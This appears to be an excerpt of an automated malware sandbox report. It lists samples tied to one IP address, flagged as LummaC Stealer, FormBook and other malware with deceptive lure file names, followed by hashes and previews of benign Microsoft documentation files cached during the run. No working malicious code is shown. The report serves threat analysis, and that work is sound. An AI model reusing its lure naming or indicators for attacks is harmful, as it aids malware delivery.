Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	eXbhgU9.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	universityform.xlsm	Get hash	malicious	Unknown	Browse	104.21.96.1
	Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse	104.21.96.1
	universityform.xlsm	Get hash	malicious	Unknown	Browse	104.21.96.1
	6QLvb9i.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	lumma.ps1	Get hash	malicious	LummaC	Browse	104.21.96.1
	vlid_acid.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.96.1
	AquaPac.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.96.1

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
Category:	downloaded
Size (bytes):	64291
Entropy (8bit):	7.964191793580486
Encrypted:	false
SSDEEP:	1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
MD5:	8CCB0248B7F2ABEEAD74C057232DF42A
SHA1:	C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
SHA-256:	0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
SHA-512:	6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
Preview:	......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[

Chrome Cache Entry: 101

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	exported SGML document, ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1173007
Entropy (8bit):	5.503893944397598
Encrypted:	false
SSDEEP:	24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
MD5:	2E00D51C98DBB338E81054F240E1DEB2
SHA1:	D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
SHA-256:	300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
SHA-512:	B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends\|\|(n=function(t,e){return n=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}\|\|function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign\|\|function(){return i=Object.assign\|\|function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read\|\|function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e\|\|e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

Chrome Cache Entry: 102

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1154
Entropy (8bit):	4.59126408969148
Encrypted:	false
SSDEEP:	24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
MD5:	37258A983459AE1C2E4F1E551665F388
SHA1:	603A4E9115E613CC827206CF792C62AEB606C941
SHA-256:	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
SHA-512:	184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/media/logos/logo_net.svg
Preview:	<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

Chrome Cache Entry: 103

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	47062
Entropy (8bit):	5.016149588804727
Encrypted:	false
SSDEEP:	768:haAq16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTKGLlO6eAbTIr4audZqBkZRLg
MD5:	1FF4CE3C1DB69A5146B03AD8BE62F5EB
SHA1:	5D177F6D11FCFF2BD62E61983383BB39D9F045E4
SHA-256:	222F320F99EF710DCE98F125314F30DAC99CF408525D86F185B317A878D48A5C
SHA-512:	36D198120D83AA9BDC2E74F80B99E2219EE4F03A8DD93A1E58A9E30BD48E829E5220A9F5FE6FC29B3810ED85005A8DCD0EAD04EE06DCCD0A15CD6D080E88641D
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Preview:	<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st

Chrome Cache Entry: 104

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (33273), with no line terminators
Category:	downloaded
Size (bytes):	33273
Entropy (8bit):	4.918756013698695
Encrypted:	false
SSDEEP:	384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
MD5:	86E84C732A96BF9CF18C99B48DB90B6D
SHA1:	6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
SHA-256:	B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
SHA-512:	AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/toc.json
Preview:	{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

Chrome Cache Entry: 105

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	35005
Entropy (8bit):	7.980061050467981
Encrypted:	false
SSDEEP:	768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:	522037F008E03C9448AE0AAAF09E93CB
SHA1:	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:	643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:	false
Preview:	.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.\|.n..]..m..`W..W.H.~..\|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y\|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il\|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......\|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

Chrome Cache Entry: 106

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13842
Entropy (8bit):	7.802399161550213
Encrypted:	false
SSDEEP:	192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
MD5:	F6EC97C43480D41695065AD55A97B382
SHA1:	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
SHA-256:	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
SHA-512:	22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
Malicious:	false
Preview:	.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo\|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo\|.Mh.km..A.k..k....n.C`\|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

Chrome Cache Entry: 107

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	4897
Entropy (8bit):	4.8007377074457604
Encrypted:	false
SSDEEP:	96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
MD5:	0E78F790402498FA57E649052DA01218
SHA1:	9ED4D0846DA5D66D44EE831920B141BBF60A0200
SHA-256:	73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
SHA-512:	B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
Malicious:	false
Preview:	{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

Chrome Cache Entry: 108

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (46884)
Category:	downloaded
Size (bytes):	1817143
Entropy (8bit):	5.501007973622959
Encrypted:	false
SSDEEP:	24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
MD5:	F57E274AE8E8889C7516D3E53E3EB026
SHA1:	F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
SHA-256:	2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
SHA-512:	9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/scripts/en-us/index-docs.js
Preview:	"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t\|\|e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"\|\|typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))\|\|n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t\|\|!e\|\|!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))\|\|r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

Chrome Cache Entry: 109

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.875
Encrypted:	false
SSDEEP:	3:HesuCkYn:+s2Y
MD5:	8666ACCA900248B6FF53EF1A2F7D34DB
SHA1:	9A06EB704EC97A663D9B7AB81586E9B65C7E8F87
SHA-256:	FE72C61E5E9D6F17591666FEEBFBDC9D782C1724887401A1EDD1237BEE7D5190
SHA-512:	5EA6AC377210A131293A52C48CF843FDEAB3E32FD1E29D6701D479CB78685E4C95962ABF2DFA5FB5EF5F4DBC79BF832C1947F9B551C4F53C081D4A556CBE2792
Malicious:	false
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkNAwtLDxRgARIFDasRA68=?alt=proto
Preview:	CgkKBw2rEQOvGgA=

Chrome Cache Entry: 110

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	3130
Entropy (8bit):	4.790069981348324
Encrypted:	false
SSDEEP:	48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
MD5:	EBA6E81304F2F555E1D2EA3126A18A41
SHA1:	61429C3FE837FD4DD68E7B26678F131F2E00070D
SHA-256:	F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
SHA-512:	3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
Preview:	{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

Chrome Cache Entry: 111

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18367
Entropy (8bit):	7.7772261735974215
Encrypted:	false
SSDEEP:	384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:	240C4CC15D9FD65405BB642AB81BE615
SHA1:	5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:	267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! ....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?\|..H+Dd.....Y%....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Chrome Cache Entry: 69

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13339
Entropy (8bit):	7.683569563478597
Encrypted:	false
SSDEEP:	192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:	512625CF8F40021445D74253DC7C28C0
SHA1:	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:	AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....\|../5_.......T...~.y.'.'.\|...W..[...C.)......\|.[.[WK...w...w..y.{..\|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....\|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..\|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Chrome Cache Entry: 70

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1432
Entropy (8bit):	4.986131881931089
Encrypted:	false
SSDEEP:	24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
MD5:	6B8763B76F400DC480450FD69072F215
SHA1:	6932907906AFCF8EAFA22154D8478106521BC9EE
SHA-256:	3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
SHA-512:	8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
Malicious:	false
Preview:	// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

Chrome Cache Entry: 71

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	18367
Entropy (8bit):	7.7772261735974215
Encrypted:	false
SSDEEP:	384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:	240C4CC15D9FD65405BB642AB81BE615
SHA1:	5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:	267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! ....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?\|..H+Dd.....Y%....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Chrome Cache Entry: 72

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	4.59126408969148
Encrypted:	false
SSDEEP:	24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
MD5:	37258A983459AE1C2E4F1E551665F388
SHA1:	603A4E9115E613CC827206CF792C62AEB606C941
SHA-256:	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
SHA-512:	184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
Malicious:	false
